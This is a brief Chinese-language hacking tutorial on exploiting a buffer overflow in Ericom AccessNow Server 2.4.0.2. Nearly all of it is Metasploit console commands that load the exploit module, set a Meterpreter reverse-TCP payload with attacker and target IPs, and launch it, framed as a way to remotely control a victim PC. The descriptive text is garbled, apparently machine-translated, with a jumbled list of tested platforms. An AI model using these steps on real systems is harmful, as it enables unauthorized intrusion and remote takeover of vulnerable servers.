黑客远程控制pc应用Ericom AccessNow服务器缓冲区溢出
脆弱性是由于与用户控制的数据将不安全的使用,它可以触发有畸形的HTTP请求。该模块已成功通过测试服务器上的Windows XP Ericom AccessNow Server 2.4.0.2 Windows 2003 Server SP3和SP2。
目标:
Ericom AccessNow Server 2.4.0.2
打开终端 msfconsole
use exploit/windows/http/ericom_access_now_bof
msf exploit (ericom_access_now_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (ericom_access_now_bof)>set lhost 192.168.1.8 (IP of Local Host)
msf exploit (ericom_access_now_bof)>set rhost 192.168.1.2 (IP of Remote PC)
msf exploit (ericom_access_now_bof)>exploit